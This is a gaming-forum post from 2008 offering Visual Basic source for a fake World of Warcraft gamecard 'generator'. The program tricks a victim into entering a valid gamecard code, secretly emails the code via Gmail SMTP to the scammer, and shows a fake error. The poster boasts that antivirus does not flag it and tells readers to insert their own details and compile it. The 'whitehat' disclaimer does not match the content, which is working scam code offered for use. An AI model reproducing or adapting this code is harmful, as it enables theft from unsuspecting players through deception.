WoW ScamsWorld of Warcraft Whitehat Scamming Methods ONLY.
[NO QUESTIONS HERE] We do not condone scamming, this section is meant for people to read about scamming so they can prevent being scammed themselves.
Well, I've been working for hours (I'm a visual basic newb) to get this program work, and finally I got it working. What it does is: Asks the victim to input a valid gamecard code, and you press generate. A little progress bar will go to 87% and it will say "Unable to read code-structure, please make sure your code is valid". Even if you try again, the same thing will happen. Anyway, the gamecard will be sent to an e-mail, which you set in the source. I have commented out what you will have to change, and I hope it will help.
To not get a lot of leeching *******s ruining the thing of this, I won't post a guide on how to use the source, I will just say:
Visual Basic 2008
Best thing with this program is that no anti-virus picks it up, it's confirmed!
[Only registered and activated users can see links. ]
The program looks like this:
Here's the code for people that wants to build the form theirselves,
I will not explain how to do it.
Code:
Imports System.Web.Mail
Imports System.Web.Util
Imports System.Web
Imports System.IO
Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim mail As New System.Net.Mail.MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("[Only registered and activated users can see links. ]", "password") 'Your g-mail login details
SmtpServer.Port = 587 'Leave it or blaim yourself
SmtpServer.Host = "smtp.gmail.com" 'Leave it or kill yourself
SmtpServer.EnableSsl = True 'Leave it or go wank
mail.To.Add("[Only registered and activated users can see links. ]") 'The e-mail you want the scammed gamecard to be sent, pick another e-mail you got
mail.From = New MailAddress("[Only registered and activated users can see links. ]") 'Same as your g-mail login, so you don't mess stuff up
mail.Subject = "Scammed Gamecard" 'Subject. Preferably you could leave it as it is
mail.Body = "Gamecard: " + TextBox1.Text 'Leave....it!!
SmtpServer.Send(mail) 'This text will turn yellow if any of your details are invalid
If TextBox1.Text = "" Then
MsgBox("Please enter a valid gamecard code.")
Else : ProgressBar1.Value = 87
Label4.Text = "Reading structure.."
MsgBox("Could not read the structure of the code! Please make sure it's valid.")
End If
End Sub
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
TextBox1.Text = ""
TextBox3.Text = ""
Label4.Text = "Waiting for request.."
ProgressBar1.Value = 1
End Sub
End Class
OR YOU COULD GET THE FULL SOURCE WITH FORM INCLUDED, JUST CHANGE TO YOUR DETAILS AND COMPILE IT! [Only registered and activated users can see links. ]
F.A.Q
Q: Can we have the compiled version of this awesome stuff?
A: No, you need to change to your information in the source
--
Q: Man, what if I get infected by a virus?
A: There's no ****ing way I can bind a virus with a source, unless there's an exploit in Visual Basic that let's you execute it, and I'm pretty sure Microsoft know what they do.. don't worry.
--
Q: Uhh.. then the source creates a virus!
A: If you're unsure about what this does, simply don't download it or compile it.
--
Q: Did you scam anyone with this yet?
A: I have no time to try it. Do it yourself.
--
Q: LOLWUT?! I see stuff such as "Premium Generator" in the files
A: That's because I based this on another application I made first.. please don't care about these files.
------------- AT LAST: PLEASE LET ME KNOW IF I LEFT ANYTHING IMPORTANT OUT, I WAS STRESSED WHEN I RELEASED THIS. ALSO I HAVE NO TIME TO PUT PROPER CREDITS, BUT THANKS TO THE VISUAL BASIC SECTION!
__________________
[Flying Piggy] << Awesome flying mount
Last edited by Y R U A NUB ?; 09-18-2008 at 05:32 PM.
Donate to remove ads, get your "DONATOR title, and get access to the MMOwned community's elite Shoutbawx.